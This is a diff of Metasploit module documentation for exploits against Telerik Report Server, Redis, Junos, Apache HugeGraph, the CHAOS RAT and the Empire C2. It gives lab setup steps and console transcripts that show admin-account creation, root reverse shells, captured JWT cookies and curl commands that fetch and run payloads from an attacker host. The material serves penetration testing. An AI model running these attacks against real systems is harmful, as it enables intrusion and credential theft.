+Password for the new account. A random value will be used unless specified.
+
+## Scenarios
+
+### Telerik Report Server 8.0.22.225 on Windows Server 2022
+
+```
+metasploit-framework (S:0 J:0) auxiliary(scanner/http/telerik_report_server_auth_bypass) > set RHOSTS 192.168.159.27
+RHOSTS => 192.168.159.27
+metasploit-framework (S:0 J:0) auxiliary(scanner/http/telerik_report_server_auth_bypass) > set VERBOSE true
+VERBOSE => true
+metasploit-framework (S:0 J:0) auxiliary(scanner/http/telerik_report_server_auth_bypass) > check
+
+[*] Detected Telerik Report Server version: 8.0.22.225.
+[+] 192.168.159.27:83 - The target is vulnerable. Telerik Report Server 8.0.22.225 is affected.
+metasploit-framework (S:0 J:0) auxiliary(scanner/http/telerik_report_server_auth_bypass) > run
+[*] Running module against 192.168.159.27
+
+[*] Creating a new administrator account using CVE-2024-4358
+[+] Created account: newton_schmeler:CkiaTtppD4eGUvl7
+[*] Auxiliary module execution completed
+metasploit-framework (S:0 J:0) auxiliary(scanner/http/telerik_report_server_auth_bypass) > creds
+Credentials
+===========
+
+host            origin          service        public                private           realm  private_type  JtR Format  cracked_password
+----            ------          -------        ------                -------           -----  ------------  ----------  ----------------
+192.168.159.27  192.168.159.27  83/tcp (http)  newton_schmeler       CkiaTtppD4eGUvl7         Password
+
+metasploit-framework (S:0 J:0) auxiliary(scanner/http/telerik_report_server_auth_bypass) >
+```
@@ -4,10 +4,49 @@ database with optional durability. Redis supports different kinds of abstract da
 such as strings, lists, maps, sets, sorted sets, HyperLogLogs, bitmaps, streams, and spatial indexes.

 This module is login utility to find the password of the Redis server by bruteforcing the login portal.
-Note that Redis does not require a username to log in; login is done purely via supplying a valid password.

 A complete installation guide for Redis can be found [here](https://redis.io/topics/quickstart)

+### Redis Authentication
+
+Redis has several ways to support secure connections to the in-memory database:
+
+* Prior to Redis 6, the `requirepass` directive could be set, setting a master password for all connections.
+  This requires the usage of the `AUTH <password>` command before executing any commands on the cluster.
+* After Redis 6, the `requirepass` directive sets a password for the default user `default`
+  * The `AUTH` command now takes two arguments instead of one: `AUTH <username> <password>`
+  * The `AUTH` command still accepts a single arguments, but defaults to the user `default`
+
+## Setup
+
+Run redis in docker without auth:
+
+```
+docker run --rm -p 6379:6379 redis
+```
+
+Optionally setting the default password for the implicit `default` username account, connect to the running Redis instance and set a password:
+
+```
+$ nc 127.0.0.1 6379
+config set requirepass mypass
+OK
+```
+
+Optionally creating an enabled `test_user` user account with password `mypass` - if ACL is supported (Redis >= 6.0.0):
+
+```
+$ nc 127.0.0.1 6379
+ACL SETUSER test_user allkeys on +@string +@set -SADD >mypass
+```
+
+Optionally creating a disabled `test_user_disabled` user account with password `mypass` - if ACL is supported (Redis >= 6.0.0):
+
+```
+$ nc 127.0.0.1 6379
+ACL SETUSER test_user_disabled allkeys off +@string +@set -SADD >mypass
+```
+
 ## Verification Steps
 1. Do: `use auxiliary/scanner/redis/redis_login`
 2. Do: `set RHOSTS [ips]`
@@ -36,11 +36,11 @@ function is `allow_url_include` which allows the use of URL-aware `fopen` wrappe
 `allow_url_include`, the exploit can use any protocol wrapper with `auto_prepend_file`. The module then uses
 `data://` to provide a file inline which includes the base64 encoded PHP payload.

-By default this exploit returns a session confined to a FreeBSD jail with limited functionality. There is a
-datastore option `JAIL_BREAK`, that when set to true, will steal the necessary tokens from a user authenticated
-to the J-Web application, in order to overwrite the root password hash. If there is no user authenticated
-to the J-Web application this method will not work. The module then authenticates with the new root password over
-SSH and then rewrites the original root password hash to /etc/master.passwd.
+By default this exploit returns a session confined to a FreeBSD jail with limited functionality when using the
+`PHP In-Memory target`. When using the `Interactive SSH with jail break` target the module will steal the necessary
+tokens from a user authenticated to the J-Web application, in order to overwrite the root password hash. If there is no
+user authenticated to the J-Web application the module will create one. The module then authenticates with the new root
+password over SSH and then rewrites the original root password hash to /etc/master.passwd.

 ### Setup

@@ -144,7 +144,7 @@ Meterpreter : php/freebsd
 meterpreter > exit
 ```

-### Interactive SSH with jail break junos-vsrx3-x86-64-20.2R1.10.scsi.ova 
+### Interactive SSH with jail break junos-vsrx3-x86-64-20.2R1.10.scsi.ova
 ```
 msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > show targets

@@ -233,4 +233,4 @@ bind:*:53:53::0:0:Bind Sandbox:/:/sbin/nologin
 uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/sbin/nologin
 nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
 admin:$6$Dj.crXwf$EyAmqaJz7f3.JldkbZk7eZuApofQ7zK/z/7Q5ntrD3cebxYc9/Y2FSoJcUIZSgYwKGGyd0nnfNSvaHzkz6BLL1:2000:20:j-super-user:0:0:Administrator:/var/home/admin:/usr/sbin/cli
-```
+```
@@ -0,0 +1,46 @@
+## Vulnerable Application
+This module exploits CVE-2024-27348 which is a Remote Code Execution (RCE) vulnerability that exists in
+Apache HugeGraph Server in versions before 1.3.0. An attacker can bypass the sandbox restrictions and achieve
+RCE through Gremlin, resulting in complete control over the server
+
+### Setup
+To install a vulnerable instance via docker run the following command:
+```
+docker run -itd --name=graph -p 8080:8080 hugegraph/hugegraph:1.0.0
+```
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/linux/http/apache_hugegraph_gremlin_rce`
+1. Set the `RHOST` and `LHOST` options
+1. Run the module
+1. Receive a Meterpreter session as the `root` user.
+
+## Scenarios
+### Apache HugeGraph 1.0.0 docker instance
+```
+
+msf6 exploit(linux/http/apache_hugegraph_gremlin_rce) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf6 exploit(linux/http/apache_hugegraph_gremlin_rce) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(linux/http/apache_hugegraph_gremlin_rce) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Apache HugeGraph version detected: 1.0.0
+[*] 127.0.0.1:9191 - Executing Automatic Target for cmd/linux/http/x64/meterpreter/reverse_tcp
+[*] Sending stage (3045380 bytes) to 172.16.199.1
+[*] Meterpreter session 8 opened (172.16.199.1:4444 -> 172.16.199.1:53803) at 2024-07-29 13:59:20 -0700
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Debian 11.4 (Linux 6.6.32-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,267 @@
+## Vulnerable Application
+
+CHAOS v5.0.8 is a free and open-source Remote Administration Tool that
+allows generated binaries to control remote operating systems. The
+webapp contains a remote command execution vulnerability which
+can be triggered by an authenticated user when generating a new
+executable. The webapp also contains an XSS vulnerability within
+the view of a returned command being executed on an agent.
+
+Execution can happen through one of three routes:
+
+1. Provided credentials can be used to execute the RCE directly
+2. A `JWT` token from an agent can be provided to emulate a compromised
+host. If a logged in user attempts to execute a command on the host
+the returned value contains an xss payload.
+3. Similar to technique 2, an agent executable can be provided and the
+`JWT` token can be extracted.
+
+Verified against CHAOS `7d5b20ad7e58e5b525abdcb3a12514b88e87cef2` running
+in a docker container.
+
+### Install
+
+Docker image: `docker run -it -v ~/chaos-container:/database/ -v ~/chaos-container:/temp/ -e PORT=8080 -e SQLITE_DATABASE=chaos -p 8080:8080 tiagorlampert/chaos:latest`
+
+To generate an agent, login (`admin`:`admin`). Click the triple lines
+to expand the menu, select `Manage`, `Generate Client`. Click `Build`.
+
+## Verification Steps
+
+1. Install the application or run the docker image
+1. Start msfconsole
+1. Do: `use exploit/linux/http/chaos_rat_xss_to_rce`
+1. Do: `set rhost [ip]`
+1. Pick a method:
+  1. `set username [username]`, `set password [password]`
+  2. `set jwt [jwt token]`
+  3. `set agent [path to agent]`
+1. Do: `run`
+1. You should get a shell. Interaction by a CHAOS admin may be required
+
+## Options
+
+### USERNAME
+
+User to login with, default for CHAOS is `admin`.
+
+### PASSWORD
+
+Password to login with, default for CHAOS is `admin`.
+
+### JWT
+
+JWT token from an agent. Used to emulate a compromised
+host.
+
+### AGENT
+
+The path to an agent executable generated by CHAOS. Used to emulate a compromised host.
+
+## Advanced Options
+
+### AGENT_HOSTNAME
+
+Hostname for a fake agent. Defaults to `DC01`.
+
+### AGENT_USERNAME
+
+Username for a fake agent. Defaults to `Administrator`.
+
+### AGENT_USERID
+
+User ID for a fake agent. Defaults to `Administrator`.
+
+### AGENT_OS
+
+OS for a fake agent. Choices are `Windows`, or `Linux`.
+Defaults to `Windows`.
+
+## Scenarios
+
+### Docker Image
+
+#### Agent Method
+
+```
+[*] Processing chaos.rb for ERB directives.
+resource (chaos.rb)> use exploit/linux/http/chaos_rat_xss_to_rce
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (chaos.rb)> set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+resource (chaos.rb)> set FETCH_SRVPORT 9090
+FETCH_SRVPORT => 9090
+resource (chaos.rb)> set agent malware2.exe
+agent => malware2.exe
+resource (chaos.rb)> set SRVHOST 111.111.10.147
+SRVHOST => 111.111.10.147
+resource (chaos.rb)> set SRVPORT 8888
+SRVPORT => 8888
+resource (chaos.rb)> set verbose true
+verbose => true
+msf6 exploit(linux/http/chaos_rat_xss_to_rce) > exploit
+
+[*] Command to run on remote host: curl -so ./SPSVaaJxd http://111.111.10.147:9090/mh1dne7HFFTZ0wiiiWgmfw; chmod +x ./SPSVaaJxd; ./SPSVaaJxd &
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf6 exploit(linux/http/chaos_rat_xss_to_rce) >
+[*] Fetch handler listening on 111.111.10.147:9090
+[*] HTTP server started
+[*] Adding resource /mh1dne7HFFTZ0wiiiWgmfw
+[*] Started reverse TCP handler on 111.111.10.147:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Chaos application found
+[*] Attempting exploitation through Agent
+[*] Server address: 172.17.0.2
+[*] Server port: 8080
+[*] Server JWT Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3NDQ4MDY5MzgsInVzZXIiOiJkZWZhdWx0In0.3zlOZ8RI_YdDqEgNbt20oL7R30Ry5JgwJVCEqx0WSUA
+[*] Fake MAC for agent: f8:16:5a:23:5b:74
+[*] Listening for XSS response on: http://111.111.10.147:8888/
+[*] Performing Callback Checkin
+[*] WebSocket connecting to receive commands
+[*] Performing Callback Checkin
+```
+
+Log in to the website, click `Acion`, `Remote Shell` on the
+fake agent we've added to the list. Now type anything into
+the input box and click `Send`.
+
+```
+[+] Received agent command 'id', sending XSS in return
+[*] Received GET request.
+[+] Received cookie: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTMzNzA0ODksIm9yaWdfaWF0IjoxNzEzMzY2ODg5LCJ1c2VyIjoiYWRtaW4ifQ.qGbOOAc8RG6Hsd2SJKzGVAczJJ7KwEI2MxdIojM06d4
+[+] Detected Agents
+Live Agents
+===========
+
+ IP         OS       Username    Hostname  MAC
+ --         --       --------    --------  ---
+ 111.111.1  Windows  Administra  DC01      86:89:42:d1:dc
+ 1.147               tor (Admin            :a7
+                     istrator)
+ 111.111.1  Windows  Administra  DC01      f8:16:5a:23:5b
+ 1.147               tor (Admin            :74
+                     istrator)
+
+[*] Client 172.17.0.2 requested /mh1dne7HFFTZ0wiiiWgmfw
+[*] Sending payload to 172.17.0.2 (curl/7.74.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (111.111.10.147:4444 -> 172.17.0.2:41290) at 2024-04-17 15:19:22 +0000
+
+msf6 exploit(linux/http/chaos_rat_xss_to_rce) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Debian 11.4 (Linux 5.19.0-43-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
+
+#### JWT Method
+
+```
+[*] Processing chaos.rb for ERB directives.
+resource (chaos.rb)> use exploit/linux/http/chaos_rat_xss_to_rce
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (chaos.rb)> set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+resource (chaos.rb)> set FETCH_SRVPORT 9090
+FETCH_SRVPORT => 9090
+resource (chaos.rb)> set jwt eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTMzNzA0ODksIm9yaWdfaWF0IjoxNzEzMzY2ODg5LCJ1c2VyIjoiYWRtaW4ifQ.qGbOOAc8RG6Hsd2SJKzGVAczJJ7KwEI2MxdIojM06d4
+jwt => eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTMzNzA0ODksIm9yaWdfaWF0IjoxNzEzMzY2ODg5LCJ1c2VyIjoiYWRtaW4ifQ.qGbOOAc8RG6Hsd2SJKzGVAczJJ7KwEI2MxdIojM06d4
+resource (chaos.rb)> set SRVHOST 111.111.63.147
+SRVHOST => 111.111.63.147
+resource (chaos.rb)> set SRVPORT 8888
+SRVPORT => 8888
+resource (chaos.rb)> set verbose true
+verbose => true
+msf6 exploit(linux/http/chaos_rat_xss_to_rce) > exploit
+
+[*] Command to run on remote host: curl -so ./HVHYAPykfOV http://111.111.63.147:9090/mh1dne7HFFTZ0wiiiWgmfw; chmod +x ./HVHYAPykfOV; ./HVHYAPykfOV &
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf6 exploit(linux/http/chaos_rat_xss_to_rce) >
+[*] Fetch handler listening on 111.111.63.147:9090
+[*] HTTP server started
+[*] Adding resource /mh1dne7HFFTZ0wiiiWgmfw
+[*] Started reverse TCP handler on 111.111.63.147:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Chaos application found
+[*] Attempting exploitation through JWT token
+[*] Fake MAC for agent: d9:74:62:8e:fc:43
+[*] Listening for XSS response on: http://111.111.63.147:8888/
+[*] Performing Callback Checkin
+[*] WebSocket connecting to receive commands
+```
+
+Log in to the website, click `Acion`, `Remote Shell` on the
+fake agent we've added to the list. Now type anything into
+the input box and click `Send`.
+
+```
+[+] Received agent command 'whoami', sending XSS in return
+[*] Received GET request.
+[+] Received cookie: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTMzNzEwMTAsIm9yaWdfaWF0IjoxNzEzMzY3NDEwLCJ1c2VyIjoiYWRtaW4ifQ.K-DCy8qNaxAHVx2Hu_Z-Ff7ZEG_TWkaount8wEM0clk
+[+] Detected Agents
+Live Agents
+===========
+
+ IP          OS       Username     Hostname  MAC
+ --          --       --------     --------  ---
+ 111.111.63  Windows  Administrat  DC01      d9:74:62:8e:fc
+ .147                 or (Adminis            :43
+                      trator)
+
+[*] Client 172.17.0.2 requested /mh1dne7HFFTZ0wiiiWgmfw
+[*] Sending payload to 172.17.0.2 (curl/7.74.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (111.111.63.147:4444 -> 172.17.0.2:55572) at 2024-04-17 15:32:59 +0000
+```
+
+### Credentialed Method
+
+```
+[*] Processing chaos.rb for ERB directives.
+resource (chaos.rb)> use exploit/linux/http/chaos_rat_xss_to_rce
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (chaos.rb)> set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+resource (chaos.rb)> set FETCH_SRVPORT 9090
+FETCH_SRVPORT => 9090
+resource (chaos.rb)> set username admin
+username => admin
+resource (chaos.rb)> set password admin
+password => admin
+resource (chaos.rb)> set SRVHOST 111.111.63.147
+SRVHOST => 111.111.63.147
+resource (chaos.rb)> set SRVPORT 8888
+SRVPORT => 8888
+resource (chaos.rb)> set verbose true
+verbose => true
+msf6 exploit(linux/http/chaos_rat_xss_to_rce) > exploit
+
+[*] Command to run on remote host: curl -so ./FdfcLgdHSudl http://111.111.63.147:9090/mh1dne7HFFTZ0wiiiWgmfw; chmod +x ./FdfcLgdHSudl; ./FdfcLgdHSudl &
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf6 exploit(linux/http/chaos_rat_xss_to_rce) >
+[*] Fetch handler listening on 111.111.63.147:9090
+[*] HTTP server started
+[*] Adding resource /mh1dne7HFFTZ0wiiiWgmfw
+[*] Started reverse TCP handler on 111.111.63.147:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Chaos application found
+[*] Attempting exploitation through direct login
+[*] Attempting login
+[*] Client 172.17.0.2 requested /mh1dne7HFFTZ0wiiiWgmfw
+[*] Sending payload to 172.17.0.2 (curl/7.74.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (111.111.63.147:4444 -> 172.17.0.2:59770) at 2024-04-17 15:40:11 +0000
+
@@ -0,0 +1,327 @@
+## Vulnerable Application
+This module exploits a directory traversal vulnerability in both
+BC-SECURITY/Empire C2 Framework (<5.9.3) and ProjectEmpire/Empire (<f030cf62) and
+writes the payload to /tmp/ directory followed by a cron.d file to execute the payload.
+
+The vulnerability affects:
+
+    * BC-SECURITY/Empire C2 Framework (<5.9.3)
+    * ProjectEmpire/Empire (<f030cf62)
+
+This module was successfully tested on:
+
+    * BC-SECURITY/Empire C2 Framework (v5.9.2) on Kali Linux 6.6.15
+    * BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15
+    * ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15
+
+
+### Install and run the vulnerable Empire
+#### BC-SECURITY/Empire
+1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
+2. Install Kali Linux (or other Linux distro) in your virtualization engine.
+3. Pull pre-built Empire docker container (<5.9.3) in your VM.
+   `docker pull bcsecurity/empire:v5.9.2`
+4. Run the server and the client on the same VM.
+5. Run the server.
+
+`docker run -it --net="host" -v /tmp:/tmp -v /etc/cron.d:/etc/cron.d bcsecurity/empire:v5.9.2`
+(`--net="host" -v /tmp:/tmp -v /etc/cron.d:/etc/cron.d` is not realistic but for simplicity
+ and payload will be loaded in host not in container) or
+```
+docker run -it --net="host" bcsecurity/empire:v5.9.2
+docker exec -it <server container id> bash
+apt update
+apt install cron
+cron
+```
+\(Payload will be loaded in container but you have to manually set up cron on container.)
+
+6. Run the client.
+`docker run -it --net="host" bcsecurity/empire:v5.9.2 client`
+7. Execute Empire listener on client.
+```bash
+uselistener http
+set Host <rhost>
+set Port <port>
+execute
+```
+
+#### ProjectEmpire/Empire
+1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
+2. Install Kali Linux (or other Linux distro) in your virtualization engine.
+3. Clone empire.
+`git clone https://github.com/EmpireProject/Empire.git`
+4. `cd Empire`
+5. `git checkout 03ca7bdbcc81457da8e8c1419b36adf66fe9b110`
+6. `docker pull empireproject/empire`
+7. `docker run -it --net="host" -v $(pwd):/opt/Empire -v /tmp:/tmp -v /etc/cron.d:/etc/cron.d empireproject/empire /bin/bash`
+
+(Payload will be loaded in host not in container.) or
+```
+docker run -it --net="host" empireproject/empire /bin/bash
+cron
+```
+(Payload will be loaded in container but you have to manually set up cron on container.)
+
+8. `cd setup`
+9. `./reset.sh` (Empire start)
+10. Execute listener.
+```bash
+listeners
+set Host <rhost>
+set Port <port>
+run
+```
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/empire_skywalker`
+4. Do: `set rhost <rhost>`
+5. Do: `set rport <port>`
+6. Do: `set lhost <attacker-ip>`
+7. Optional: `set CVE <cve>`
+8. Do: `run`
+9. Have the generated request processed by a vulnerable version of Empire
+10. You should get a shell or meterpreter
+
+
+## Options
+
+###  TARGETURI (optional)
+
+This is the Base URI path. This is used when CVE is set to `Original`. Default is `/`.
+
+### STAGE0_URI (required)
+
+This is the URI path requested by the initial launcher. This is used when CVE is set to `Original`. Default is `index.asp`.
+
+### STAGE1_URI (required)
+
+This is the URI path used by the RSA key post. This is used when CVE is set to `Original`. Default is `index.jsp`
+
+### PROFILE (optional)
+
+This is Empire agent traffic profile URI. This is used when CVE is set to `Original`.
+
+### CVE (required)
+
+This is the vulnerability to use. Default is `CVE-2024-6127`, but `Original` can also be chosen.
+
+### STAGE_PATH (required)
+
+This is the Empire's default staging path. This is used when CVE is set to `CVE-2024-6127`. Default is `login/process.php`.
+([reference](https://github.com/BC-SECURITY/Empire/blob/8aca42747da6cf2b0def7edede94586f6b3258e8/empire/server/common/agents.py#L169))
+
+### PROFILE (required)
+
+This is the Empire's default communication profile agent.  This is used when CVE is set to `CVE-2024-6127`.
+Default is `Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko`
+([reference](https://github.com/BC-SECURITY/Empire/blob/8aca42747da6cf2b0def7edede94586f6b3258e8/empire/server/common/agents.py#L169))
+
+
+## Scenarios
+### BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 0, port 80)
+```
+msf6 > use exploit/linux/http/empire_skywalker
+[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.7
+rhost => 192.168.56.7
+msf6 exploit(linux/http/empire_skywalker) > set rport 80
+rport => 80
+msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf6 exploit(linux/http/empire_skywalker) > check
+[*] 192.168.56.7:80 - The target appears to be vulnerable.
+msf6 exploit(linux/http/empire_skywalker) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[+] Successfully negotiated an artificial Empire agent
+[*] Writing payload to /tmp/NYLkIKRK
+[*] Writing cron job to /etc/cron.d/AeVTTPiZ
+[*] Waiting for cron job to run, can take up to 60 seconds
+[*] Sending stage (24772 bytes) to 192.168.56.7
+[+] Deleted /etc/cron.d/AeVTTPiZ
+[+] Deleted /tmp/NYLkIKRK
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.7:48026) at 2024-07-20 11:32:03 +0900
+[!] This exploit may require manual cleanup of '/var/lib/powershell-empire/empire/server/downloads/LML47FWS/agent.log' on the target
+
+meterpreter > sysinfo
+Computer        : kali
+OS              : Linux 6.6.15-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.6.15-2kali1 (2024-05-17)
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+```
+
+### BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 1, port 8080)
+```
+msf6 > use exploit/linux/http/empire_skywalker
+[*] Using configured payload linux/x86/shell/reverse_tcp
+msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
+rhost => 192.168.56.6
+msf6 exploit(linux/http/empire_skywalker) > set rport 8080
+rport => 8080
+msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf6 exploit(linux/http/empire_skywalker) > set target 1
+target => 1
+msf6 exploit(linux/http/empire_skywalker) > set payload linux/x86/shell/reverse_tcp
+payload => linux/x86/shell/reverse_tcp
+msf6 exploit(linux/http/empire_skywalker) > check
+[*] 192.168.56.6:8080 - The target appears to be vulnerable.
+msf6 exploit(linux/http/empire_skywalker) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[+] Successfully negotiated an artificial Empire agent
+[*] Writing payload to /tmp/jJzYkeKV
+[*] Writing cron job to /etc/cron.d/nFnFIbim
+[*] Waiting for cron job to run, can take up to 60 seconds
+[*] Sending stage (36 bytes) to 192.168.56.6
+[+] Deleted /etc/cron.d/nFnFIbim
+[+] Deleted /tmp/jJzYkeKV
+[!] Tried to delete /var/lib/powershell-empire/empire/server/downloads/WV9TEJTE/agent.log, unknown result
+[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:42068) at 2024-07-20 14:40:09 +0900
+
+whoami
+root
+```
+
+### BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 2, port 8080)
+```
+msf6 > use exploit/linux/http/empire_skywalker
+[*] Using configured payload linux/x86/shell/reverse_tcp
+msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
+rhost => 192.168.56.6
+msf6 exploit(linux/http/empire_skywalker) > set rport 8080
+rport => 8080
+msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf6 exploit(linux/http/empire_skywalker) > set target 2
+target => 2
+msf6 exploit(linux/http/empire_skywalker) > set payload linux/x64/shell/reverse_tcp
+payload => linux/x64/shell/reverse_tcp
+msf6 exploit(linux/http/empire_skywalker) > check
+[*] 192.168.56.6:8080 - The target appears to be vulnerable.
+msf6 exploit(linux/http/empire_skywalker) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[+] Successfully negotiated an artificial Empire agent
+[*] Writing payload to /tmp/qxlOSIYF
+[*] Writing cron job to /etc/cron.d/ugrYIJzf
+[*] Waiting for cron job to run, can take up to 60 seconds
+[*] Sending stage (38 bytes) to 192.168.56.6
+[+] Deleted /etc/cron.d/ugrYIJzf
+[+] Deleted /tmp/qxlOSIYF
+[!] Tried to delete /var/lib/powershell-empire/empire/server/downloads/JJR8EMKK/agent.log, unknown result
+[*] Command shell session 4 opened (192.168.56.1:4444 -> 192.168.56.6:46040) at 2024-07-20 14:44:09 +0900
+
+whoami
+root
+```
+
+### ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 0, port 8080)
+```
+msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
+rhost => 192.168.56.6
+msf6 exploit(linux/http/empire_skywalker) > set rport 8080
+rport => 8080
+msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf6 exploit(linux/http/empire_skywalker) > set CVE Original 
+CVE => Original
+msf6 exploit(linux/http/empire_skywalker) > check
+[*] 192.168.56.6:8080 - The target appears to be vulnerable.
+msf6 exploit(linux/http/empire_skywalker) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[+] Successfully negotiated an artificial Empire agent
+[*] Writing payload to /tmp/PSDaqPOJ
+[*] Writing cron job to /etc/cron.d/KQlwBZQk
+[*] Waiting for cron job to run, can take up to 60 seconds
+[*] Sending stage (24772 bytes) to 192.168.56.6
+[+] Deleted /etc/cron.d/KQlwBZQk
+[+] Deleted /tmp/PSDaqPOJ
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:38552) at 2024-07-24 18:01:04 +0900
+[!] This exploit may require manual cleanup of '/agent.log' on the target
+
+meterpreter > sysinfo
+Computer        : kali
+OS              : Linux 6.6.15-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.6.15-2kali1 (2024-05-17)
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > 
+```
+
+### ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 1, port 8080)
+```
+msf6 > use exploit/linux/http/empire_skywalker
+[*] Using configured payload linux/x86/shell/reverse_tcp
+msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
+rhost => 192.168.56.6
+msf6 exploit(linux/http/empire_skywalker) > set rport 8080
+rport => 8080
+msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf6 exploit(linux/http/empire_skywalker) > set CVE Original
+CVE => Original
+msf6 exploit(linux/http/empire_skywalker) > set target 1
+target => 1
+msf6 exploit(linux/http/empire_skywalker) > set payload linux/x86/shell/reverse_tcp
+payload => linux/x86/shell/reverse_tcp
+msf6 exploit(linux/http/empire_skywalker) > check
+[*] 192.168.56.6:8080 - The target appears to be vulnerable.
+msf6 exploit(linux/http/empire_skywalker) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[+] Successfully negotiated an artificial Empire agent
+[*] Writing payload to /tmp/VzTAquhE
+[*] Writing cron job to /etc/cron.d/LjvThMOu
+[*] Waiting for cron job to run, can take up to 60 seconds
+[*] Sending stage (36 bytes) to 192.168.56.6
+[+] Deleted /etc/cron.d/LjvThMOu
+[+] Deleted /tmp/VzTAquhE
+[!] Tried to delete /agent.log, unknown result
+[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:47140) at 2024-07-24 18:06:08 +0900
+
+whoami
+root
+```
+
+### ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 2, port 8080)
+```
+msf6 > use exploit/linux/http/empire_skywalker
+[*] Using configured payload linux/x86/shell/reverse_tcp
+msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
+rhost => 192.168.56.6
+msf6 exploit(linux/http/empire_skywalker) > set rport 8080
+rport => 8080
+msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
+lhost => 192.168.56.1
